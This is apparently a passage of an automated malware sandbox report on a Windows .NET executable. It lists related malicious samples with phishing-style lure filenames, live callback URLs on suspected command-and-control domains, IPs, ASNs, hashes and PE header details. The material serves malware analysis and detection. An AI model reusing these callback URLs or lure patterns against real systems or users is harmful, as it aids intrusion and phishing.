                                                                      • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, eus2-consumerrp-displaycatalog-aks2aks-useast.md.mp.microsoft.com.akadns.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, blobcollector.events.data.trafficmanager.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, skypedataprdcolwus15.cloudapp.net, au-bg-shim.trafficmanager.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                                      • Not all processes where analyzed, report is missing behavior information

                                                                      Simulations

                                                                      Behavior and APIs

                                                                      TimeTypeDescription
                                                                      18:06:50API Interceptor1x Sleep call for process: lTAPQJikGw.exe modified

                                                                      Joe Sandbox View / Context

                                                                      IPs

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                      147.255.162.204FORM C1.xlsxGet hashmaliciousBrowse
                                                                      • www.balloon-artists.com/p2io/?lljDp=/DMwn9vWy800YsKh/syYwdBt6sFcRXVvVa9RfefW4qtbzd0YMa9UIUL094XAf/k7aTyZLw==&4h=wZutZX1pT2
                                                                      6dTTv9IdCw.exeGet hashmaliciousBrowse
                                                                      • www.balloon-artists.com/p2io/?G0Dp=/DMwn9vTy70wY8Gt9syYwdBt6sFcRXVvValBDdDX8KtazsYeLKsYeQz2+eXGHe8zWlG4SE48vQ==&vPqT4=6lnLSRg0
                                                                      ENrFQVzLHE.exeGet hashmaliciousBrowse
                                                                      • www.balloon-artists.com/p2io/?BVJ8=/DMwn9vTy70wY8Gt9syYwdBt6sFcRXVvValBDdDX8KtazsYeLKsYeQz2+d78EfQIVSnp&2dH=6lulgtV04zDxcZFP
                                                                      xhbUdeAoVP.exeGet hashmaliciousBrowse
                                                                      • www.balloon-artists.com/p2io/?AT8dsFg=/DMwn9vTy70wY8Gt9syYwdBt6sFcRXVvValBDdDX8KtazsYeLKsYeQz2+d7WbvgIRQvp&oZB=TDHH6Plx34Vd
                                                                      Contract MAY2021.xlsxGet hashmaliciousBrowse
                                                                      • www.balloon-artists.com/p2io/?Ozu4_XoX=/DMwn9vWy800YsKh/syYwdBt6sFcRXVvVa9RfefW4qtbzd0YMa9UIUL094XAf/k7aTyZLw==&hhD0=gXzt_B
                                                                      Compliance A.xlsxGet hashmaliciousBrowse
                                                                      • www.balloon-artists.com/p2io/?1bw0d=/DMwn9vWy800YsKh/syYwdBt6sFcRXVvVa9RfefW4qtbzd0YMa9UIUL094XAf/k7aTyZLw==&LdUpz=JTE8MxX0g2a
                                                                      a6362829_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                      • www.balloon-artists.com/p2io/?8pMhHJUH=/DMwn9vTy70wY8Gt9syYwdBt6sFcRXVvValBDdDX8KtazsYeLKsYeQz2+d7WbvgIRQvp&Gzux=XB2LdrUxY
                                                                      92bd9987_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                      • www.balloon-artists.com/p2io/?Ulm=/DMwn9vTy70wY8Gt9syYwdBt6sFcRXVvValBDdDX8KtazsYeLKsYeQz2+eXGHe8zWlG4SE48vQ==&SVg84P=yjR8DXLxiJb
                                                                      e759c6e8_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                      • www.balloon-artists.com/p2io/?RPx=/DMwn9vTy70wY8Gt9syYwdBt6sFcRXVvValBDdDX8KtazsYeLKsYeQz2+ebGUOwwP1Gu&rVLp5Z=S0GhCH_
                                                                      RDAx9iDSEL.exeGet hashmaliciousBrowse
                                                                      • www.balloon-artists.com/p2io/?KtxL=/DMwn9vTy70wY8Gt9syYwdBt6sFcRXVvValBDdDX8KtazsYeLKsYeQz2+d7WbvgIRQvp&NtTdXn=wXL40t9Hkrxhn
                                                                      5PthEm83NG.exeGet hashmaliciousBrowse
                                                                      • www.balloon-artists.com/p2io/?NtTdgz=/DMwn9vTy70wY8Gt9syYwdBt6sFcRXVvValBDdDX8KtazsYeLKsYeQz2+eX/YvcwYza/SE478g==&1bj=mj88chf8ThLT
                                                                      k7AgZOwF4S.exeGet hashmaliciousBrowse
                                                                      • www.balloon-artists.com/p2io/?5j3=/DMwn9vTy70wY8Gt9syYwdBt6sFcRXVvValBDdDX8KtazsYeLKsYeQz2+d7WbvgIRQvp&vT=LJBt
                                                                      lFfDzzZYTl.exeGet hashmaliciousBrowse
                                                                      • www.balloon-artists.com/p2io/?_RAd4V=YL0THJvhl8d&iBIXf4M=/DMwn9vTy70wY8Gt9syYwdBt6sFcRXVvValBDdDX8KtazsYeLKsYeQz2+eXGHe8zWlG4SE48vQ==
                                                                      o52k2obPCG.exeGet hashmaliciousBrowse
                                                                      • www.balloon-artists.com/p2io/?tZU4=/DMwn9vTy70wY8Gt9syYwdBt6sFcRXVvValBDdDX8KtazsYeLKsYeQz2+eX/YvcwYza/SE478g==&UlSp=GTgP1nZH9J34Epg
                                                                      q3uHPdoxWP.exeGet hashmaliciousBrowse
                                                                      • www.balloon-artists.com/p2io/?N4=/DMwn9vTy70wY8Gt9syYwdBt6sFcRXVvValBDdDX8KtazsYeLKsYeQz2+d7WbvgIRQvp&2d=Yn8xRlsx
                                                                      KL9fcbfrMB.exeGet hashmaliciousBrowse
                                                                      • www.balloon-artists.com/p2io/?idCtDnlP=/DMwn9vTy70wY8Gt9syYwdBt6sFcRXVvValBDdDX8KtazsYeLKsYeQz2+d7WbvgIRQvp&TT=FjUh3Tu
                                                                      foHzqhWjvn.exeGet hashmaliciousBrowse
                                                                      • www.balloon-artists.com/p2io/?4h0=/DMwn9vTy70wY8Gt9syYwdBt6sFcRXVvValBDdDX8KtazsYeLKsYeQz2+ebGUOwwP1Gu&wR=MHQD
                                                                      198.185.159.144SKlGhwkzTi.exeGet hashmaliciousBrowse
                                                                      • www.anewdistraction.com/p2io/?xN6x=ia0dgIkdnBZILDuo3zp8eo0tNiPxoXJfkPpt6P05AAGh3ZPzSagLTNX+xDwAHOv6iOkY&YluDM=Ofc4YV0pThsp
                                                                      New Purchase Order20210609.exeGet hashmaliciousBrowse
                                                                      • www.kokoshaveice.com/un8c/?3f-H3H=aZaLIE/CsZEbnkZXVKNJbEuElQpMoyTdbfBzj8jhRt7QilQZi3fXZMlsJ6JzgR8z/eaN&6lGd=HBZ81PLPUzqhOj
                                                                      LkvumUsaQX.exeGet hashmaliciousBrowse
                                                                      • www.totally-seo.com/p2io/?7ntDA=TySV6YYzJGXnavbEwOCoDLKT5SC+Z4HfI/S6WoKTLKp4rrhaLWxPw3pQ7PESKodUP59hGuNmhA==&p48x=MN6xDxf80FMxbj4
                                                                      Payment slip.exeGet hashmaliciousBrowse
                                                                      • www.shopkaitek.com/3edq/?2dUX-PAP=M8eNvF5zuYq6F34lAt80R5nTraHCYrh0rbrF9J+SqtSL9q0uJh3MK9H55PeJhjWLLkFu&D6Otan=1bu800r
                                                                      New Order Vung Ang TPP Viet Nam.exeGet hashmaliciousBrowse
                                                                      • www.kokoshaveice.com/un8c/?z8b=iZspkzE0JnS86&m6=aZaLIE/CsZEbnkZXVKNJbEuElQpMoyTdbfBzj8jhRt7QilQZi3fXZMlsJ6FzzBwwmOab/JVn8A==
                                                                      tzeEeC2CBA.exeGet hashmaliciousBrowse
                                                                      • www.totally-seo.com/p2io/?6lFp-=X8U4Iv&Yr0=TySV6YYzJGXnavbEwOCoDLKT5SC+Z4HfI/S6WoKTLKp4rrhaLWxPw3pQ7MooJpxvMOcw
                                                                      8mnXkjPdP0.exeGet hashmaliciousBrowse
                                                                      • www.mkpricephoto.com/sh2m/?8pQLN=M5mtQoHkyhxvNjqVlN4PGsv6kOee2cR+qVO1qalFjtpNC9HX6pJqwZiEg4Ppodp8IyRJ90NYeQ==&D6Ot3x=-Z8XfPP
                                                                      17jLieeOPx.exeGet hashmaliciousBrowse
                                                                      • www.totally-seo.com/p2io/?D48=TySV6YYzJGXnavbEwOCoDLKT5SC+Z4HfI/S6WoKTLKp4rrhaLWxPw3pQ7MooJpxvMOcw&2dYX6=1b-D6VYx
                                                                      fMWJqYA8ae.exeGet hashmaliciousBrowse
                                                                      • www.anewdistraction.com/p2io/?d0=5juHFPp&3fut_=ia0dgIkdnBZILDuo3zp8eo0tNiPxoXJfkPpt6P05AAGh3ZPzSagLTNX+xAc6EPDBh5FJ4wioMw==
                                                                      scan-copy059950059pdf.exeGet hashmaliciousBrowse
                                                                      • www.brooklynbrewbazaar.com/fmjo/?2dS4SpX8=qUbk/uSP+pf6p8qmG7yr2cJmoye0DgYz5erMRyDDKx4Ymj9j4BqWqohjbtdVFlEBw6X/&qXYlb=6lNDIzXhO2g0
                                                                      SKMBT_C224307532DL23457845_Product Order doc.exeGet hashmaliciousBrowse
                                                                      • www.naturalbeautyapparel.com/ftgq/?8p=58hLLa3vc2EaUDgAeKLskrXr8RI4DwN7z0OiuDdYZF5g/qPz05bciOqqek20YkD5yVzPo95r2g==&C48xf8=VFQ8p8YH
                                                                      rove.exeGet hashmaliciousBrowse
                                                                      • www.weab3.com/aipc/?6lSp=ArO83PE0Mh0TtZa0&bv4=/8Z60H0U3EWOvTAhTSZ91XRC3z3gfjmKnWg9Zo5NhivUL2SmA7Vc3Hh6HSm+FPngCfqp
                                                                      Failure Notice Details PDF.exeGet hashmaliciousBrowse
                                                                      • www.the-vma.com/j6xw/?pR-xqjW=KJ21CI6nWllw3jb6LNy/7vVKy2oA2dLgDihDwOEUrsElLp9L7M0HGY7NagSED+cXyB7S&srL4=IdpX_hpxaNVLNhX
                                                                      1092991(JB#082).exeGet hashmaliciousBrowse
                                                                      • www.shopkaitek.com/3edq/?JfEt9j6h=M8eNvF5zuYq6F34lAt80R5nTraHCYrh0rbrF9J+SqtSL9q0uJh3MK9H55PeJhjWLLkFu&ojn0d=RzuliD
                                                                      Payment SWIFT_Pdf.exeGet hashmaliciousBrowse
                                                                      • www.kellymoorefilms.com/5yue/?GFNDG=9mA+j1cgE0zxC7u3qAlNO+Wrolxb+XCp7JX8Z/rof2uElfHtAjnndbvjTcdg6uA8+xkX&Jv7=XVIXpLcx
                                                                      #U20ac9,770 pdf.exeGet hashmaliciousBrowse
                                                                      • www.cljcandles.com/pux4/?Lv0h=urYAAIc58DnUlhBmQa3gzHotkVmoZ0i8F09uLhqyCxRxwOZO+pPIwoj8ux/FJwO59BkQzbo13w==&VlKt=wBNl4pd0L
                                                                      HEN.exeGet hashmaliciousBrowse
                                                                      • www.portsidemonograms.com/aipc/?TlPt=tbuhbkKiZMbT51ggHlN5rcc+6ZFSDnA65ra1I1/h1SUWu7EEXe8DiVlqCzHYPKZm0j3JlFNexg==&6l=mnSl
                                                                      Taisier Med Surgical Sutures.exeGet hashmaliciousBrowse
                                                                      • www.weab3.com/aipc/?K8kl=/8Z60H0U3EWOvTAhTSZ91XRC3z3gfjmKnWg9Zo5NhivUL2SmA7Vc3Hh6HSqHJuLgVZ24lc1TFw==&lxo8y=MzuD_P1pZJ
                                                                      Purchase Order.pdf.exeGet hashmaliciousBrowse
                                                                      • www.jessicarusselldesign.com/gad0/?1bB=YNKficl4JuMpHD9ZucCDdKw50e3rZtwSzoj4IBtnMReh6UW5QmvMrqjFxOO0E0XDXWWo&3fS=dfc8-RnPKT4
                                                                      DHL_119045_Receipt document,pdf.exeGet hashmaliciousBrowse
                                                                      • www.wombatwellness.com/vfm2/?2d=mlyx&tzr8=UK/k0ZYUzZvJjxXC0JaC6NFAiBcJLAkUYbslNP+YAqhew59pS6ch9v0JexfzNGtQhbXqRxr51g==

                                                                      Domains

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                      www.myfavbutik.comLetter 1019.xlsxGet hashmaliciousBrowse
                                                                      • 172.67.161.4
                                                                      LkvumUsaQX.exeGet hashmaliciousBrowse
                                                                      • 104.21.15.16
                                                                      IsIMH5zplo.exeGet hashmaliciousBrowse
                                                                      • 172.67.161.4
                                                                      xhbUdeAoVP.exeGet hashmaliciousBrowse
                                                                      • 172.67.161.4
                                                                      n2fpCzXURP.exeGet hashmaliciousBrowse
                                                                      • 172.67.161.4
                                                                      7LQAaB3oH4.exeGet hashmaliciousBrowse
                                                                      • 172.67.161.4
                                                                      bin.exeGet hashmaliciousBrowse
                                                                      • 104.21.15.16
                                                                      netwire.exeGet hashmaliciousBrowse
                                                                      • 172.67.161.4
                                                                      noSpfWQqRD.exeGet hashmaliciousBrowse
                                                                      • 104.21.15.16
                                                                      e759c6e8_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                      • 172.67.161.4
                                                                      APPROVED.xlsxGet hashmaliciousBrowse
                                                                      • 104.21.15.16
                                                                      5PthEm83NG.exeGet hashmaliciousBrowse
                                                                      • 172.67.161.4
                                                                      qmhFLhRoEc.exeGet hashmaliciousBrowse
                                                                      • 104.21.15.16
                                                                      dw0Iro1gcR.exeGet hashmaliciousBrowse
                                                                      • 172.67.161.4
                                                                      Request For Courtesy Call.xlsxGet hashmaliciousBrowse
                                                                      • 104.21.15.16
                                                                      g2qwgG2xbe.exeGet hashmaliciousBrowse
                                                                      • 172.67.161.4
                                                                      g0g865fQ2S.exeGet hashmaliciousBrowse
                                                                      • 104.21.15.16

                                                                      ASN

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                      LEASEWEB-USA-SFO-12USFORM C1.xlsxGet hashmaliciousBrowse
                                                                      • 147.255.162.204
                                                                      qXDtb88hht.exeGet hashmaliciousBrowse
                                                                      • 23.82.57.32
                                                                      6dTTv9IdCw.exeGet hashmaliciousBrowse
                                                                      • 147.255.162.204
                                                                      wMKDi0Ss3f.exeGet hashmaliciousBrowse
                                                                      • 23.82.57.32
                                                                      ENrFQVzLHE.exeGet hashmaliciousBrowse
                                                                      • 147.255.162.204
                                                                      Request For Courtesy Call 7710090112332.xlsxGet hashmaliciousBrowse
                                                                      • 23.82.57.32
                                                                      xhbUdeAoVP.exeGet hashmaliciousBrowse
                                                                      • 147.255.162.204
                                                                      bin.exeGet hashmaliciousBrowse
                                                                      • 23.82.57.32
                                                                      b02c0831_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                      • 23.82.57.32
                                                                      Contract MAY2021.xlsxGet hashmaliciousBrowse
                                                                      • 147.255.162.204
                                                                      Compliance A.xlsxGet hashmaliciousBrowse
                                                                      • 147.255.162.204
                                                                      Wire Payment Of $35,276.70.exeGet hashmaliciousBrowse
                                                                      • 23.106.92.86
                                                                      a6362829_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                      • 147.255.162.204
                                                                      92bd9987_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                      • 147.255.162.204
                                                                      e759c6e8_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                      • 147.255.162.204
                                                                      NEW ORDER SOR 10531220.exeGet hashmaliciousBrowse
                                                                      • 172.255.115.89
                                                                      BANK-ACCOUNT. NUMBER.PDF.exeGet hashmaliciousBrowse
                                                                      • 172.255.115.119
                                                                      126-21-11HAR.exeGet hashmaliciousBrowse
                                                                      • 172.255.208.73
                                                                      PO#10244.exeGet hashmaliciousBrowse
                                                                      • 23.82.175.79
                                                                      PI34567890987.exeGet hashmaliciousBrowse
                                                                      • 23.82.175.79
                                                                      AMAZON-02USSKlGhwkzTi.exeGet hashmaliciousBrowse
                                                                      • 44.227.65.245
                                                                      SecuriteInfo.com.Trojan.Packed2.43183.29557.exeGet hashmaliciousBrowse
                                                                      • 13.59.53.244
                                                                      Letter 1019.xlsxGet hashmaliciousBrowse
                                                                      • 18.140.1.169
                                                                      #U260e#Ufe0f Zeppelin.com AudioMessage_259-55.HTMGet hashmaliciousBrowse
                                                                      • 143.204.98.37
                                                                      Proforma Invoice and Bank swift-REG.PI-0086547654.exeGet hashmaliciousBrowse
                                                                      • 75.2.26.18
                                                                      U03c2doc.exeGet hashmaliciousBrowse
                                                                      • 108.128.238.226
                                                                      Letter 09JUN 2021.xlsxGet hashmaliciousBrowse
                                                                      • 18.140.1.169
                                                                      Docc.htmlGet hashmaliciousBrowse
                                                                      • 13.224.99.74
                                                                      ManyToOneMailMerge Ver 18.2.dotmGet hashmaliciousBrowse
                                                                      • 52.209.246.140
                                                                      Sleek_Free.exeGet hashmaliciousBrowse
                                                                      • 143.204.209.58
                                                                      ManyToOneMailMerge Ver 18.2.dotmGet hashmaliciousBrowse
                                                                      • 52.216.141.230
                                                                      #Ud83d#Udcde_#U25b6#Ufe0f.htmGet hashmaliciousBrowse
                                                                      • 15.236.176.210
                                                                      WV Northern Community College.docxGet hashmaliciousBrowse
                                                                      • 52.43.249.183
                                                                      wzdu53.exeGet hashmaliciousBrowse
                                                                      • 13.249.13.113
                                                                      com.duolingo_1162_apps.evozi.com.apkGet hashmaliciousBrowse
                                                                      • 52.222.174.5
                                                                      rnPij0Z886.dllGet hashmaliciousBrowse
                                                                      • 13.224.91.73
                                                                      Plex-v8.7.1.20931_build_812981296-armeabi-v7a(Apkgod.net).apkGet hashmaliciousBrowse
                                                                      • 99.81.164.127
                                                                      Nota Fiscal Eletronica 00111834.msiGet hashmaliciousBrowse
                                                                      • 54.171.246.133
                                                                      #U00a0Import Custom Duty invoice & its clearance documents.exeGet hashmaliciousBrowse
                                                                      • 75.2.26.18
                                                                      919780-920390.exeGet hashmaliciousBrowse
                                                                      • 99.83.162.16
                                                                      SQUARESPACEUSSKlGhwkzTi.exeGet hashmaliciousBrowse
                                                                      • 198.185.159.144
                                                                      New Purchase Order20210609.exeGet hashmaliciousBrowse
                                                                      • 198.185.159.144
                                                                      LkvumUsaQX.exeGet hashmaliciousBrowse
                                                                      • 198.185.159.144
                                                                      Payment slip.exeGet hashmaliciousBrowse
                                                                      • 198.185.159.144
                                                                      New Order Vung Ang TPP Viet Nam.exeGet hashmaliciousBrowse
                                                                      • 198.185.159.144
                                                                      tzeEeC2CBA.exeGet hashmaliciousBrowse
                                                                      • 198.185.159.144
                                                                      8mnXkjPdP0.exeGet hashmaliciousBrowse
                                                                      • 198.185.159.144
                                                                      17jLieeOPx.exeGet hashmaliciousBrowse
                                                                      • 198.185.159.144
                                                                      fMWJqYA8ae.exeGet hashmaliciousBrowse
                                                                      • 198.185.159.144
                                                                      scan-copy059950059pdf.exeGet hashmaliciousBrowse
                                                                      • 198.185.159.144
                                                                      SKMBT_C224307532DL23457845_Product Order doc.exeGet hashmaliciousBrowse
                                                                      • 198.185.159.144
                                                                      rove.exeGet hashmaliciousBrowse
                                                                      • 198.185.159.144
                                                                      Failure Notice Details PDF.exeGet hashmaliciousBrowse
                                                                      • 198.185.159.144
                                                                      1092991(JB#082).exeGet hashmaliciousBrowse
                                                                      • 198.185.159.144
                                                                      Payment SWIFT_Pdf.exeGet hashmaliciousBrowse
                                                                      • 198.185.159.144
                                                                      #U20ac9,770 pdf.exeGet hashmaliciousBrowse
                                                                      • 198.185.159.144
                                                                      HEN.exeGet hashmaliciousBrowse
                                                                      • 198.185.159.144
                                                                      Taisier Med Surgical Sutures.exeGet hashmaliciousBrowse
                                                                      • 198.185.159.144
                                                                      Purchase Order.pdf.exeGet hashmaliciousBrowse
                                                                      • 198.185.159.144
                                                                      DHL_119045_Receipt document,pdf.exeGet hashmaliciousBrowse
                                                                      • 198.185.159.144

                                                                      JA3 Fingerprints

                                                                      No context

                                                                      Dropped Files

                                                                      No context

                                                                      Created / dropped Files

                                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\lTAPQJikGw.exe.log
                                                                      Process:C:\Users\user\Desktop\lTAPQJikGw.exe
                                                                      File Type:ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):1314
                                                                      Entropy (8bit):5.350128552078965
                                                                      Encrypted:false
                                                                      SSDEEP:24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEw:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHR
                                                                      MD5:1DC1A2DCC9EFAA84EABF4F6D6066565B
                                                                      SHA1:B7FCF805B6DD8DE815EA9BC089BD99F1E617F4E9
                                                                      SHA-256:28D63442C17BF19558655C88A635CB3C3FF1BAD1CCD9784090B9749A7E71FCEF
                                                                      SHA-512:95DD7E2AB0884A3EFD9E26033B337D1F97DDF9A8E9E9C4C32187DCD40622D8B1AC8CCDBA12A70A6B9075DF5E7F68DF2F8FBA4AB33DB4576BE9806B8E191802B7
                                                                      Malicious:true
                                                                      Reputation:high, very likely benign file
                                                                      Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

                                                                      Static File Info

                                                                      General

                                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                      Entropy (8bit):7.529224716638736
                                                                      TrID:
                                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                      • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                                      • DOS Executable Generic (2002/1) 0.01%
                                                                      File name:lTAPQJikGw.exe
                                                                      File size:865792
                                                                      MD5:16657fa097cd334973a5489eeff8bafe
                                                                      SHA1:b6db5e9cc112155b7285f0a415cf4889ff1bf7ef
                                                                      SHA256:2589143d02f6aef252b5b704f6b98723ae131d3279bcf36d57ee26318bc0741f
                                                                      SHA512:982bfb6516d594a13ea987a878aed98125679b2a607a855b6a78283ce58da258a925faa75f8e72d25d591b6514bcc8786ec05231c2d0ebdd80ff2ec9931d4ec2
                                                                      SSDEEP:12288:TTHukblMV40uUSeQdQtq02pd55BcAbTDIbd5uIiDLuaCwH3:TqkbUuUxQh02pdnBcAbXedOLnCwH
                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...f..`..............P..............4... ...@....@.. ....................................@................................

                                                                      File Icon

                                                                      Icon Hash:f0e1e0b2b2ccb2cc

                                                                      Static PE Info

                                                                      General

                                                                      Entrypoint:0x4a340e
                                                                      Entrypoint Section:.text
                                                                      Digitally signed:false
                                                                      Imagebase:0x400000
                                                                      Subsystem:windows gui
                                                                      Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                      DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                      Time Stamp:0x60C10566 [Wed Jun 9 18:16:06 2021 UTC]
                                                                      TLS Callbacks:
                                                                      CLR (.Net) Version:v4.0.30319
                                                                      OS Version Major:4
                                                                      OS Version Minor:0
                                                                      File Version Major:4
                                                                      File Version Minor:0
                                                                      Subsystem Version Major:4
                                                                      Subsystem Version Minor:0
                                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                      Entrypoint Preview

                                                                      Instruction
                                                                      jmp dword ptr [00402000h]
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al

                                                                      Data Directories

                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0xa33bc0x4f.text
                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xa40000x31a4c.rsrc
                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0xd60000xc.reloc
                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0xa32840x1c.text
                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                      Sections

                                                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                      .text0x20000xa14140xa1600False0.843792360573SysEx File - Clavia7.73125493594IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                      .rsrc0xa40000x31a4c0x31c00False0.442927528266data6.16976587686IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                      .reloc0xd60000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

